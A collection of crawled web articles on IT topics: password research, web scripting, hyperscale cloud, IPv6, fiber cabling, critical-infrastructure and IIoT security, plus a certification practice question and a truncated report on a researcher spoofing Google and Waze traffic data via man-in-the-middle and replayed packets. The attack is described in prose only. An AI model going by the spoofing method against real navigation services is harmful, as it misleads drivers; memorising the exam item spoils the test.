<urn:uuid:85c944ea-4764-418d-a5d2-593b96eb11b6>
CC-MAIN-2017-09
http://www.cio-today.com/article/index.php?story_id=91371
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172831.37/warc/CC-MAIN-20170219104612-00632-ip-10-171-10-108.ec2.internal.warc.gz
en
0.954715
823
2.65625
3
New research shows that "123456" is a good password after all. In fact, such useless credentials from a security standpoint have an important role in an overall password management strategy, researchers at Microsoft and Carleton University, Ottawa, Canada, have found. Rather than hurt security, proper use of easy-to-remember, weak credentials encourages people to use much stronger passwords on the few critical sites and online services they visit regularly. "Many sites ask for passwords, but they require no security at all," Paul C. Van Oorschot, a Carleton professor and a co-author of the research, said. "They basically want to get the email address to contact you, but there's nothing to protect." Strong passwords would be more likely adopted if people learned to use them only on critical accounts, such as employer websites, online banking and e-commerce sites that store the user's credit card number. To be effective, this group should be small. Websites that hold no sensitive information and would not present a threat if hacked should get the throwaway credentials. However, people need to carefully select that sites that get those passwords. "Far from optimal outcomes will result if accounts are grouped arbitrarily," the research says. Following the standard advice of choosing and never reusing passwords of eight characters or more that includes uppercase and lowercase letters, numbers and special characters, is "an impossible task as portfolio size grows," the research said. Studies have shown that despite warnings, people continue to use the same weak password across websites. In 2013, the most commonly used password on the Internet was "123456," followed by "password." Therefore, rather than continue pushing a failed password strategy, the industry should adopt something that actually works, the researchers argue. "Our model yields detailed results; it indicates that any strategy that rules out weak passwords or re-use will be sub-optimal," the paper says. The researchers also argued that a password grouping strategy is more secure than a password manager, which stores passwords and their corresponding site URLs in the cloud and lets people access the information using a single master password. "If the master password is guessed or used on any malware-infected client, or the cloud store is compromised, then all credential are lost," the paper said. Indeed, researchers at the University of California, Berkeley, studied five password managers and found vulnerabilities that could be exploited to gain access to master passwords. The vendors studied included LastPass, RoboForm, My1login, PasswordBox and NeedMyPassword. Although the latest research focuses on individuals, it has implications for business. Companies are making a website or corporate network less secure if they require employees to use complex passwords that are difficult to remember and have to be changed every three months, Avivah Litan, analyst for Gartner, said. In those cases, users will counter the security measure by writing down the password or storing it in a digital address book that could get hacked. "You need to strike a balance between customer convenience and security and that balance is struck by having other measures besides passwords," Litan said. Businesses should also have technology in place that monitors login behavior and user activity to watch for anomalies that would indicate malware or hackers. This story, "Why '123456' is a Great Password" was originally published by CSO.
<urn:uuid:d4bce739-b147-474c-b005-785638d04441>
CC-MAIN-2017-09
http://www.cio.com/article/2455449/identity-access/why-123456-is-a-great-password.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174215.11/warc/CC-MAIN-20170219104614-00156-ip-10-171-10-108.ec2.internal.warc.gz
en
0.953952
693
2.703125
3
Gone are the days when producing a Web page simply involved writing some HTML code or painting a screen using Microsoft's Frontpage Web design tool. These days, with the Internet going into e-commerce overdrive everyone wants dynamic Web experiences. Scripting has taken a quantum leap. There are two main categories of scripting language - either client or server-based. They are designed to describe attributes and functions that can be interpreted by browsers to produce a Web page. By submitting your personal information, you agree that TechTarget and its partners may contact you regarding relevant content, products and special offers. Client-side Web scripting started off with hypertext markup language (HTML), which was a static scripting language used purely to describe how a page would look. You can use HTML, for example, to position a headline, and decide which colour it will be. HTML has come a long way since it was first developed as the basis for the World Wide Web at the start of the 1990s. The World Wide Web Consortium (W3C), the industry body that ratifies some Internet standards, has released version 4.0 of the technology. VBScript was designed by Microsoft and is a scripting version of its Visual Basic programming language. The problem with the technology is that although it offers great functionality (it is also used in Microsoft Office to customise applications) it is only understood by Microsoft Internet Explorer. The row over browsers, however, combined with the proliferation of different client devices such as WAP phones, has led to a slow departure from client-side scripting in favour of server-side scripting. Processing everything on the server means that you can give everyone a similar experience of your Web site, while making allowances for different display types. One of the first scripting interfaces for the server was the common gateway interface (CGI), which enables applications to interpret scripting languages, carrying out different functions as a result. Perl is one of the most common languages used to write to CGI, although this language is hardly intuitive to use. Microsoft developed active server pages (.asp) as a means of taking inputs from a Web page (from a form, for example) and processing them so that they can interact with objects on the server. This means the input could be used to look up a database, for example. Once the processing has been completed the active server page can then take the output and render it into HTML for display in the browser. Sun Microsystems responded with Java server pages (JSP) another scripting language that differs because the scripts are compiled and loaded as servlets - small programs sitting on the Web server. Compiled programs are generally faster than interpreted ones, so JSP applications can provide performance advantages (see box above). According to documentation from software development company Rational, most of an application's business logic should not be held in a scripted page. Rather, it should be held in the business objects that the page interacts with. The server-side scripted page should essentially be the way for the browser to talk to a server-based program. One of the biggest steps when moving from a static environment to a server-side scripted environment is knowing how the scripts will interact with the middle tier, which contains all of the complicated programming logic that drives the application. This means that you must have a thorough understanding of the technical architecture of the application, and it also means that if the application changes, the scripting must be regression tested - tested with the new code - to make sure that it still works properly. One advantage to server-side and client-side scripts is that they are easy to implement. Rather than having to learn a complicated language like C++ or Java you can pick up much scripting functionality in the course of a few days. But don't let the ease of implementation tempt you into undisciplined development. You still need to observe conventional procedures and safety measures when changing your code. Next week: Danny Bradbury looks at browser wars and their aftermath. Learn your lines - a guide to Web scripts with its Internet information server [IIS]. Scripted pages sit on the Web server and provide an interpreted interface between the browser and the back-end application.
<urn:uuid:99dbca19-0c6d-46e2-a935-06b1862bd75d>
CC-MAIN-2017-09
http://www.computerweekly.com/feature/Scripting-languages
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501169776.21/warc/CC-MAIN-20170219104609-00400-ip-10-171-10-108.ec2.internal.warc.gz
en
0.947838
851
2.921875
3
Virtualized Data Center Early designs of cloud computing focused on blades with an independent Storage Area Network (SAN) architecture. This blueprint consolidated the CPU and memory into dense blade server configurations connected via several high-speed networks (typically a combination of Fibre Channel and 10GB) to large Storage Area Networks. This has been a typical blueprint delivered by traditional off the shelf pre-built virtualization infrastructure, especially in the enterprise in private cloud configurations. More recently, hardware vendors have been shipping modular commodity hardware in dense configurations known as Hyperscale computing. The most noticeable difference is the availability of hard drives, or solid state drives (SSDs), within the modules. This gives the virtualization server and the VMs access to very fast persistent storage and eliminates the need for an expensive SAN to provide storage in the cloud. The hyperscale model not only dramatically changes the Price / Performance model of cloud computing but, because it is modular, it also allows you to build redundancies into the configuration for an assumed failure architecture. For the mCloud solution, this architecture also provides the implementation team more flexibility by affording a “Lego block” like model of combining compute nodes and storage nodes into optimal units within a VLAN grouping of a deployment. This allows for the management of a large resource pool of compute and storage into an individually controlled subset of the data center infrastructure. A hyperscale architecture is a synergistic infrastructure for SOA. It too uses the idea of simple, commodity functions. Hyperscale architectures have removed expensive system management components and, instead, focus on what matters to the cloud, which is compute power and high density storage. Simple architectures are easy to scale. In other words, an architecture that contains system management and other resiliency features in order to achieve high availability will be more difficult to scale, due to complexity, than an architecture with simpler commodity components that offloads failover to the application. The hyperscale model makes it easy and cost effective to create a dynamic infrastructure because of low-cost, easily replaceable components, which can be located either in your data center or in remote places. The components are easy to acquire and replace. In contrast, an architecture that puts the responsibility for HA in the infrastructure, is much more complex and harder to scale. Using this approach, in a massively scalable system, it’s been reported that IT operators wait for many disks (even up to 100) to fail before scheduling a mass replacement, thereby making maintenance more predictable as well. Enterprises require application availability, performance, scale, and a good price. If you’re trying to remain competitive today, your philosophy must assume that application availability is the primary concern for your business. And you will need the underlying infrastructure that allows your well-architected applications to be highly available, scalable, and performant. Businesses and their developers are realizing that in order to take advantage of cloud, their applications need to be based on a Service Oriented Architecture (SOA). SOA facilitates scalability and high availability (HA) because the services which comprise an SOA application can be easily deployed across the cloud. Each service performs a specific function, provides a standard and well-understood interface and, therefore, is easily replicated and deployed. If a service fails, there is typically an identical service that can transparently support the user request (e.g., clustered web servers). If any of these services fail, they can be easily restarted, either locally or remotely (in the event of a disaster). Well-written applications can take advantage of the innovate streamlined, high-performing, and scalable architecture of hyperscale clouds. Hosted Private Clouds built on hyperscale hardware and leverage open source aim to provide a converged architecture (software services to hardware components) in which everything is easy to troubleshoot and is easily replaceable with the minimum disruption. With the micro-datacenter design, failure of the hardware is decoupled from the failure of the application. If your application is designed to take advantage of the geographically dispersed architecture, your users will not be aware of hardware failures because the application is still running elsewhere. Similarly, if your application requires more resources, Dynamic Resource Scaling allows your application to burst transparently from the user’s perspective. By abstracting the function of computation from the physical platform on which computations run, virtual machines (VMs) provided incredible flexibility for raw information processing. Close on the heels of compute virtualization came storage virtualization, which provided similar levels of flexibility. Dynamic Resource Scaling technology, amplified by Carrier Ethernet Exchanges, provides high levels of location transparency, high availability, security, and reliability. In fact, by leveraging the Hosted Private Clouds with DRS, an entire data center can be incrementally defined by software and temporarily deployed. One could say a hosted private cloud combined with dynamic resource scaling creates a secures and dynamic “burst-able data center.” Applications with high security and integration constraints, and which IT organizations previously found difficult to deploy in burst-able environments, are now candidates for deployment in on-demand scalable environments made possible by DRS. By using DRS, enterprises have the ability to scale the key components of the data center (compute, storage, and networking) in a public cloud-like manner (on-demand, OpEx model), yet retain the benefits of private cloud control (security, ease of integration). Furthermore, in addition to the elasticity, privacy, and cost savings, hyperscale architecture affords enterprises new possibilities for disaster mitigation and business continuity. Having multiple, geographically dispersed nodes gives you the ability to fail over across regions. The end result is a quantum leap in business agility and competitiveness. By Winston Damarillo CEO and Co-founder of Morphlabs Winston is a proven serial entrepreneur with a track record of building successful technology start-ups. Prior to his entrepreneurial endeavors, Winston was among the highest performing venture capital professionals at Intel, having led the majority of his investments to either a successful IPO or a profitable corporate acquisition. In addition to leading Morphlabs, Winston is also involved in several organizations that are focused on combining the expertise of a broad range of thought leaders with advanced technology to drive global innovation and growth.
<urn:uuid:58d650ce-8223-46c4-9a7c-794e014fbd63>
CC-MAIN-2017-09
https://cloudtweaks.com/2012/03/leveraging-a-virtualized-data-center-to-improve-business-agility-conclusion/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170864.16/warc/CC-MAIN-20170219104610-00100-ip-10-171-10-108.ec2.internal.warc.gz
en
0.928587
1,283
2.75
3
Question 1) Test Yourself on CompTIA i-Net+. Objective : Network SubObjective : Understand and be able to Describe the Use of Internet Domain Names and DNS Single Answer Multiple Choice DNS uses a lookup table to resolve names. Which record type in the DNS table is used for the assignment of multiple, fully qualified domain names to one IP address? An IP address can be assigned to more than one fully qualified domain name. The DNS lookup table must contain the multiple names for the IP address. The record in the DNS table that denotes an IP address assigned multiple, fully qualified domain names is CNAME, which stands for canonical name. An example of the CNAME record is: A is an address record. The A record is used to directly map the record’s host name to its IP address. MX is a mail exchange record. The MX record is used to identify the mail exchanger for a host. PTR is a pointer record. The PTR record is used to directly map the record’s IP address to its hostname. These questions are derived from the Self Test Software Practice Test for CompTIA Exam #IK0-002: i-Net+.
<urn:uuid:52a6f94c-d57e-4171-a726-9be02b50d1e8>
CC-MAIN-2017-09
http://certmag.com/question-1-test-yourself-on-comptia-i-net/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501173405.40/warc/CC-MAIN-20170219104613-00328-ip-10-171-10-108.ec2.internal.warc.gz
en
0.869902
251
3.671875
4
Apple [AAPL] already provides support for IPv6, the latest iteration of the IP addressing system that launches today, World IPv6 day. While the significance of this may not impact you just yet, I've put together a general guide to IPv6, the reasons to support it, and Apple's support. [ABOVE: Now available at Apple's retail outlets, the Nest Learning Thermostat is an example of the kind of connected devices which will drive future IPv6 adoption.] What is IPv6? In very simple terms, the Internet relies on IP addresses to find every computer, server, smartphone and iPad on the vast network (there are alternative methods, such as NAT addressing). Until now we've been using a standard called IPv4, which is not directly compatible with IPv6 and must be run concurrently. However, the IPv4 standard is only capable of offering up 4.3 billion unique IP addresses, and while that sounds like an awful lot, it isn't as we're expecting over 50 billion connected devices will be in use by 2020. IPv6 is the solution. It promises 340 undecillion (3,400 followed by 35 zeros) IP addresses. That's hopefully going to be enough to serve the Internet to mobile devices, Macs, PCs, and the coming wave of M2M and connected home devices (above). There's an excellent infographic explaining the need to move to IPv6 right here. IPv6 was originally expected to run in parallel with IPv4, with transition expected to begin immediately. This didn't happen as ISPs and online enterprises resisted the migration, they didn't need the expense. One problem with IPv6 is its backward incompatibility with the preceding standard -- you need to "tunnel" traffic via IPv4 networks, among other ways to run both concurrently. To tunnel means an: "IPv6 packet is put inside an IPv4 packet so it can be forwarded by existing IPv4 routers until it reaches an IPv6-capable router again." Business has lacked a clear case for adoption of the standard. The case is emerging now as the explosion in mobile and connected devices, particularly in emerging markets has seen many players in those markets opt for IPv6. As an example, an online retail store based on IPv4 will not be accessible to users on IPv6 networks until it (and its ISP) deploy support for this. Many enterprise providers are now working toward IPv6 support today in order to invest in the expertise they require to manage tomorrow's full transition. Apple and IPv6 Starting with Jaguar, Mac OS X supports IPv6 out of the box. In 2008, Google data confirmed Apple users to be ten times more likely to be IPv6-capable than Windows and Linux users. Apple also offers some support resources. For example, you can test your IPv6 connectivity by visiting this webpage. If you find sites you regularly visit cease to function correctly in the next few days, Apple notes some helpful suggestions for resolving IPv6 connectivity problems, symptoms of which might include: - The web browser is unresponsive after you enter a search in the search field - The web browser reports that it is unable to connect to server because it isn't responding - The web browser connects, but only after several minutes - The web browser connects, but downloads take much longer than normal, or never complete - Other Internet-enabled activities such as reading mail or posting photos do not complete, possibly only when using certain sites Be aware: today is IPv6 day, when Google, YouTube, Yahoo, Akamai, Facebook and over 2,500 websites are switching on their IPv6 provision. This means many smaller websites and search engines are also experimenting with support for the standard, so those problems listed above may appear in the next few days on a service or site you regularly use. So here's Apple's troubleshooting link again. "While it is expected that fewer than 1 out of every 20,000 people will be affected on June 8, 2011, some customers may experience difficulties such as performing searches or connecting to popular websites, such as Google, Yahoo!, YouTube, and Facebook," Apple informs. "World IPv6 Launch Day is a lot larger than people understand," says president and CEO of the American Registry for Internet Numbers (ARIN), John Curran. "It's not a small decision for the major content providers to turn on IPv6 and leave it on. From now on, everything they roll out will be on IPv4 and IPv6." AirPort and IPv6 "One key advantage of IPv6 is that it configures itself automatically. In most cases, your computer and applications will detect and take advantage of IPv6-enabled networks and services without requiring any action on your part," Apple tells us, while also offering instructions with which to manually enable or disable support for it. For the most part, Apple's applications (Safari for example) also support IPv6, but there's a few flaws in this (see here). Apple's AirPort Base Stations already support IPv6, though the company removed specific management tools from its AirPort Utility software within the most recent release, which generated much hue and cry. It isn't known yet how the company intends updating the software for the management features you need for the standard. "Apple has taken the ability to seamlessly support IPv6 away from the AirPort Utility.. It's a little concerning. We hoped to see more IPv6 support, not less, among [customer premises equipment] vendors," responded Comcast's Chief Architect for IPv6, John Brzozowski. However, given that OS x and iOS both now support IPv6, it's clear the company recognizes the importance of such support. The growing awareness of IPv6 is articulated within the most recent Arbor 'Worldwide Infrastructure Security Report': "Nearly 42 percent of respondents project that their IPv6 traffic volume will increase 20 percent over the next 12 months, almost 18 percent forecast greater than a 100 percent IPv6 volume increase across the same period." So, is it all IPv6 everywhere? Short answer: No. Today's move by some of the biggest Internet firms to enable support for the standard is significant, but most analysts expect full migration to take until 2020. Meanwhile you'll see an Internet based on both IPv4 and IPv6. Most major ISPs are moving to adopt it, as are equipment suppliers, but as with any transition you can expect the unexpected -- there will be problems. Must we make the move? Yes. Connected devices sales are exploding. These don't just include your iPads, iPhones and smartphones, these also include IP-enabled cars (smart cities aren't too far away), the fast-growing markets in mHealth devices, home intelligence and industrial control systems and more. As an example, it's thought that 92 million cars will be connected to the Internet by 2016 while 825 million electricity meters will also be connected. Yes, there are alternatives to IP address provision for some of these devices, but these numbers are huge -- 4.3 billion addresses just aren't enough. In 2011, 53 percent of the 201 million IP addresses allocated by the provision authorities went to companies in the Asia-Pacific, where IPv6 provision is far advanced. These booming markets will quickly catch up in terms of smartphone use and mobile device allocation, and will forge ahead with new notions of the connected age. Apple's leading position in the mobile device industry hasn't yet translated into the firm taking an active position vis-a-vis IPv6 Day, but it's operating systems long-existing support for the addressing schema confirms the company is ready to embrace the transition. What should it mean to you as an everyday user? As little as possible: all parties investing in IPv6 support are attempting to implement it with as little inconvenience to customers as possible, however if you are using older equipment it is worth checking to see if your devices can support the protocol, as you'll likely find elements of your Internet experience will change in the coming months. Got a story? Drop me a line via Twitter or in comments below and let me know. I'd like it if you chose to follow me on Twitter so I can let you know when these items are published here first on Computerworld.
<urn:uuid:c9a22d03-0d38-45bb-bb2b-241e193f6208>
CC-MAIN-2017-09
http://www.computerworld.com/article/2471817/internet/apple-s-iphone-driven-mobile-future--ipv6--and-you.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501173405.40/warc/CC-MAIN-20170219104613-00328-ip-10-171-10-108.ec2.internal.warc.gz
en
0.945009
1,705
2.515625
3
Fiber optic cables form one of the most important parts of the networking industry today. Fiber cables are composed of one or more transparent optical fibers enclosed in a protective covering and strength members. Fiber cables are used to transmit data by the mode of light. Various types of fiber cables available are multimode duplex fiber cables, single mode simplex fiber cables, single mode duplex fiber cables, armored fiber cables and plastic optical fiber cables. What is Armored Fiber Cable Armored Fiber Cable, is outside the optical fiber is then wrapped in a layer of protective of “armor”, is mainly used to meet the requirements of customers rodent, moisture proof, etc. Armored cable is a power cable made up by assembling two or more electrical conductors, generally held together with an overall sheath. This electrical cable with high protective covering is used for transmission of electrical power, especially for underground wiring needs. However, these cables may be installed as permanent wiring within buildings, buried in the ground, run overhead, or may even be kept exposed. They are available as single conductor cable as well as multi-conductor cables. Common Armored Fiber Cable Armored fiber optic cables are often installed in a network for added mechanical protection, as they have extra reinforcing in the cable housing to prevent damage. Two types of armored fiber optic cables exist: interlocking and corrugated. Interlocking armor is an aluminum armor that is helically wrapped around the cable and found in indoor and indoor/outdoor cables. It offers ruggedness and superior crush resistance. Corrugated armor is a coated steel tape folded around the cable longitudinally. It is found in outdoor cables and offers extra mechanical and rodent protection. Armored Flame Retardant Fiber Optic Cable for Indoor/Outdoor Applications Indoor/outdoor fiber optic cables have been pretty hot in the last several years and there are good reasons for this. For service providers, indoor/outdoor fiber cables really present big time and cost savings. This cable design can come from the outdoor environment and enter a building without the need to switch cable designs to have the flame retardance required indoors. This dual purpose cable can reduce the cost of the terminations and related labor to change cable designs. The development of dry water blocking core technology has also helped indoor/outdoor fiber cable development. This dry core technology uses water swellable materials to block the flow of moisture in the longitudinal direction.We also provide other types of fiber optic cable,such as the waterproof cable,waterproof fiber pigtail cable can be used in harsh environment. It is mainly used in outdoor connection of the optical transmitter. Waterproof fiber pigtail is designed with a stainless steel strengthened waterproof unit and armored outdoor PE jacketed cables. Note:If you want to know more detail fiber optic cable specifications of armored fiber cable,you can visit the armored fiber cable products website in FiberStore.Every fiber optic cables have the different specifications,and if you have some questions of fiber optic cable specifications,pls contact us.
<urn:uuid:7411e00f-21bb-4888-9d2a-891f03a8cb4c>
CC-MAIN-2017-09
http://www.fs.com/blog/an-overview-of-the-armored-fiber-cable.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170249.75/warc/CC-MAIN-20170219104610-00096-ip-10-171-10-108.ec2.internal.warc.gz
en
0.926396
615
3.125
3
“Critical infrastructure consists of physical and information technology assets, such as the electricity distribution networks, telecommunications networks, banking systems, manufacturing and transportation systems, as well as government information systems and services that support the continued and effective functioning of government. Elements of critical infrastructure can be stand-alone or interconnected and interdependent within and across provinces, territories, and international borders. Most of Canada’s critical infrastructure is owned by the private sector or by municipal, provincial, or territorial governments, and much of it is connected to other systems. Cyber threats to Canada’s critical infrastructure refer to the risk of an electronic attack through the Internet. Such attacks can result in the unauthorized use, interruption, or destruction of electronic information or of the electronic and physical infrastructure used to process, communicate, or store that information. Our audit examined whether selected federal departments and agencies are working with the provinces and territories and the private sector to protect Canada’s critical infrastructure against cyber threats. This included examining leadership roles and responsibilities for securing key government information systems.”
<urn:uuid:41ea39f7-8d15-4914-b5be-99e5d8edcccb>
CC-MAIN-2017-09
http://www.fedcyber.com/2012/10/23/protecting-canadian-critical-infrastructure-against-cyber-threats/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170613.8/warc/CC-MAIN-20170219104610-00272-ip-10-171-10-108.ec2.internal.warc.gz
en
0.935078
213
2.859375
3
Level of Gvt: State Problem/situation: While access to the Internet can provide important government information to residents of a state, most services are costly. Solution: Maryland introduced Sailor, a program that allows Maryland residents to visit the Internet through the state library for free. By David Noack While state and local governments across the country continue to place information on the Internet, Maryland has become the first state to offer free access for its residents to the global collection of networks. The ambitious project, called Sailor, provides residents with the opportunity to tap into global, state and local libraries and databases brimming with information, news and research materials. Additional services, such as e-mail and file transfer, costs about $35 per year. The system, developed by the Maryland Department of Education's Division of Library Development and Services, also offers access to more than a dozen libraries and research databases, community news, and state and local government information. Users can locate churches or child care centers in their area, find out if the book they're looking for is available and learn more about the Maryland Legislature or a particular state agency. MARYLAND GENERAL ASSEMBLY Residents - or anybody else with an interest in state government - can get historical, biographical and legislative information about the Maryland General Assembly using Sailor. There are also biographies of state senators and members of the House of Delegates. Information on a number of state agencies such as the Governor's Office, Public Broadcasting Commission and State Lottery Agency is available. Sailor debuted last summer. The project was partially funded by a $2 million federal grant and officials are seeking ongoing state funding to maintain and improve the system. When Sailor is complete, it will be capable of handling 600 dial-in telephone lines and modems. While library systems across the country are beginning to provide Internet access on a localized basis, Maryland offers statewide access for the cost of a local telephone call. Officials hope to have local phone access provided for the state's 3.5 million residents in 24 counties by this summer. Examples of other libraries providing free or low-cost Internet access include the Morris County Public Library System in New Jersey, which last year inaugurated an Internet project called MORENET, and earlier this year, the Baltimore County Public Library began offering full service dial-up Internet accounts for a small fee, which includes e-mail, Telnet, File Transfer Protocol and access to the World Wide Web via a text-based browser called Lynx. Because Sailor is overseen by the state Department of Education, many of its resources are geared toward education. "We are looking at how to get state budget and legislation action online," said Maurice Travillian, assistant superintendent of the state Department of Education. Barbara G. Smith, Sailor project manager, said the system was designed with the public in mind. "Sailor enables Marylanders of all ages to begin to use the Internet. It is widely used in schools and many people dial-in from their home or office. Numerous colleges and universities make it available through campuswide information systems," said Smith. Sailor grew out of a librarian networking project started in 1992 called Seymour, which was in response to a request from the State Library Networking Coordinating Council. In early 1993, the Computer Science Center at the University of Maryland at College Park (UMCP) suggested that a Gopher server be used to create a publicly-accessible Internet system, replacing Seymour. Smith said that even though the name of the project has changed, the goals and mission statement - rapid, easy access to information - remains the same. "We learned a lot from the original Gopher at UMCP and that knowledge became the foundation for the current Gopher," he said. "We really like Gopher as a way to get this service started. It's friendly, most computers will work with it, our 56KBs network will support it, and we can load a variety of files we've begun to collect at the state and local level." THE LIBRARY TREND The continuing movement among libraries to offer Internet access is far removed from the original mission of the global computer "network of networks." The Internet initially started in 1969 as a defense and research networking tool to be used in case of nuclear war. The decentralization of the network - with no central access point or command center - made it difficult for a warhead to disable the entire network. Over the last 25 years, however, the Internet evolved from its defense and research roots to where it's now used by an estimated 30 million people in a variety of ways, from e-mail and transferring files to accessing databases. What's attracting many new users, who usually gain access through use of commercial or fee-based Internet Service Providers (ISPs), is the vast amount of information and resources available. While Sailor provides Maryland residents with a free peek into the Internet window of resources, some features common to commercial ISPs are unavailable unless an account is established. Travillian of the Department of Education said a main reason statewide Internet access was provided is to keep pace with the way information is rapidly being adapted to electronic platforms. "The information used to be in books or in magazines and newspapers and the library collected them. It's now digitized," Travillian said. "The supply of our information is coming in a different form, [so] the library has to provide it in a different way." One of the most popular features of the system is an employment database, which provides information on local, state, federal and private sector job opportunities. And as state and local government information is added to the system, localities view it as a way to promote their county or town to spur tourism and economic development. "Some local governments are jumping on this," Travillian said. "Some counties have been eager to bring their information [online] and see it partly as a tourist thing that will help bring people in and also as an economic development tool." Sailor project manager Smith said one of the advantages of providing access to the information superhighway is that people not accustomed to it are "amazed" by its capabilities. "Librarians have been organizing access to information for centuries, and now we are bringing those same skills to the Internet," she said. "At the same time, we are opening access for people who might not have the opportunity. We are leveling the playing field." [June Table of Contents]
<urn:uuid:b57987fa-e36b-44f0-b153-cd8dada92daf>
CC-MAIN-2017-09
http://www.govtech.com/magazines/gt/Maryland-quotCybrariesquot-Offer-Internet-Browsing-.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170875.20/warc/CC-MAIN-20170219104610-00448-ip-10-171-10-108.ec2.internal.warc.gz
en
0.950954
1,324
2.53125
3
Energy plants and factories have always been prime targets for delivering a devastating setback and psychological blow against an enemy. Today, attacks against critical infrastructure can be just as disruptive when launched in cyberspace. The threat of cyber-attacks against Industrial Internet of Things (IIoT) is very real. For instance, a cyber-attack on a Ukrainian power station in 2015 caused a loss of power affecting 225,000 customers. Cyber-attacks against critical network infrastructure can have severe consequences and this has put world governments on high alert. Threat to IIoT In the U.S., the Department of Homeland Security (DHS) has raised concerns over the growing number of cyber-attacks on industrial control networks. In fact, the DHS takes the situation so seriously that they recently published guidelines to “provide a strategic focus on security and enhance the trust framework that underpins the IoT ecosystem.” The document is the first attempt to provide clear cybersecurity guidance to organizations implementing IIoT and calls for a combined approach. Among the measures discussed are “considered connectivity” and “defense in depth”. Failing to Measure Up The Federal Trade Commission (FTC) has named and shamed numerous companies whose data privacy and security procedures have fallen short of good practice. One example is a company called Lifelock who failed to ensure employees had adequate security on computers they were using to access the network remotely. The FTC also made an example of Premier Capital Lending who they say provided a remote login account so that one of their clients could access consumer reports. Unfortunately, they did this without auditing their client’s security which allowed hackers to steal online passwords and consumer personal information. Failure to properly secure third-party access was also featured in the case of Dave & Buster. On this occasion, the third party had been granted more access than it needed. The absence of restricting connections to specified IP addresses or imposing time limits was said to have allowed an intruder to connect to the network causing a leak of personal information. The question of whether to put similar limits on industrial IoT connections lies at the heart of what the DHS means by “considered connectivity”. It is not unusual for an IIoT component in a networked environment to fail or suffer from some kind of service disruption. The DHS guide asks organizations to consider very carefully and deliberately the risks following a possible breach or device failure compared with the costs of limiting Internet connectivity. For instance, continuous network access may be convenient but is it strictly necessary in the context of what the device does? A nuclear reactor having a continuous connection to the Internet carries too great a risk because it also opens the door to a network intrusion. Defense in Depth IIoT organizations are advised to adopt a defense in depth approach to help them stay ahead of privacy and security risks. Defense in depth comprises three steps: - Understand exactly what the device does – Without a full appreciation of the function and scope of each individual device, organizations run the risk of activating direct connections to the Internet when they are not strictly needed. - Make a conscious decision about every IIoT connection – Sometimes connecting to a local network to allow the content of critical information to be analyzed before it is sent is sufficient. Industrial Control Systems (ICS) are complex and critical and it is essential to protect them using defense in depth principles. - Build in remote management capability – Manufacturers, critical network infrastructures and service providers must be able to disable network connections or specific ports remotely when needed. Remote Connectivity Needs Managed VPNs Despite their vital contribution, IIoT systems often have to be installed in some of the remotest and most inaccessible places imaginable. They are also highly attractive to cybercriminals who regard them as the most vulnerable point in the network. Protection of remote connections on IIoT systems is best managed with Virtual Private Network (VPN) software. VPNs form a secure connection at the remote IIoT gateway, integrating seamlessly with existing infrastructure and encrypting all data traffic passing to and from individual devices. To achieve defense-in-depth, NCP engineering recommends IIoT organizations give careful consideration to on-demand/always-on access along with command line or API control. Additionally, authentication in the form of software/hardware network certification and central management for remotely configuring devices are advisable. In summary, the stance taken by regulators on the subject of IIoT or machine-to-machine (M2M) security has focused on organizations taking adequate precautions to manage and protect data privacy. By following some basic ground rules and securing every necessary remote connection with VPN Management, it should be possible for companies to stay ahead of cybersecurity threats. For good measure, it is advisable to keep things under constant review and give clear instructions for IT operatives to follow in depth privacy and security practices.
<urn:uuid:4ee14187-e6cb-416d-8362-ea1cfc16a5cf>
CC-MAIN-2017-09
http://vpnhaus.ncp-e.com/2017/02/16/careful-connections-are-key-to-mitigating-cyber-attacks-on-iiot-systems/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171078.90/warc/CC-MAIN-20170219104611-00624-ip-10-171-10-108.ec2.internal.warc.gz
en
0.937947
1,010
2.546875
3
Hackers can influence real-time traffic-flow-analysis systems to make people drive into traffic jams or to keep roads clear in areas where a lot of people use Google or Waze navigation systems, a German researcher demonstrated at BlackHat Europe. Google and Waze both offer turn-by-turn navigation in smartphone apps and use information derived from those phones for real-time traffic analysis. However, because of the tradeoff between user privacy and data gathering, hackers can anonymously influence navigation software to trick the real-time traffic system into registering something that isn't there, said Tobias Jeske, a doctoral student at the Institute for Security in Distributed Applications of the Hamburg University of Technology, during the security conference in Amsterdam. "You don't need special equipment for this and you can manipulate traffic data worldwide," Jeske said. Both Google and Waze use GPS as well as Wi-Fi in phones to track locations. If Wi-Fi alone is enabled, only information about wireless access points and radio cells in the surrounding area will be transferred, which lets the navigation systems approximate the location of the user, Jeske said. Google navigation uses real-time traffic information in Google Maps for mobile. The protocol used to send location information is protected by a TLS (Transport Layer Security) tunnel that ensures the data integrity so that it is impossible for an attacker to monitor a foreign phone or modify information without being detected by Google, said Jeske. However, TLS is useless if the attacker controls the beginning of the TLS tunnel, he added. To be able to control the beginning of the tunnel, Jeske performed a man-in-the-middle attack on an Android 4.0.4 phone to insert himself into the communication between the smartphone and Google. When the attacker controls the beginning of the tunnel, false information can be sent without being detected and in this way attackers are able to influence the traffic-flow analysis, according to Jeske. If, for example, an attacker drives a route and collects the data packets sent to Google, the hacker can replay them later with a modified cookie, platform key and time stamps, Jeske explained in his research paper. The attack can be intensified by sending several delayed transmissions with different cookies and platform keys, simulating multiple cars, Jeske added. An attacker does not have to drive a route to manipulate data, because Google also accepts data from phones without information from surrounding access points, thus enabling an attacker to influence traffic data worldwide, he added. A similar attack scenario can be applied to Waze, but it is more difficult to affect the navigation of other drivers, Jeske said. Waze associates position data with user accounts, so an attacker who wants to simulate more vehicles needs different accounts with different email addresses, he added. Jeske also found a way to transfer position data to Waze without user authentication, rendering the attacker anonymous, he said, without elaborating on that method. For an attacker to actual influence traffic, a substantial number of Waze or Google navigation users have to be in the same area. When it comes to Waze, that is probably not going to happen, for instance, around Hamburg, he said. Waze, however, had 20 million users worldwide in July last year, so there should be areas where it is possible, he said. Although Jeske hasn't tested the vulnerability of other services offering real-time traffic data, they work more or less the same way as Google and Waze, so he expects that 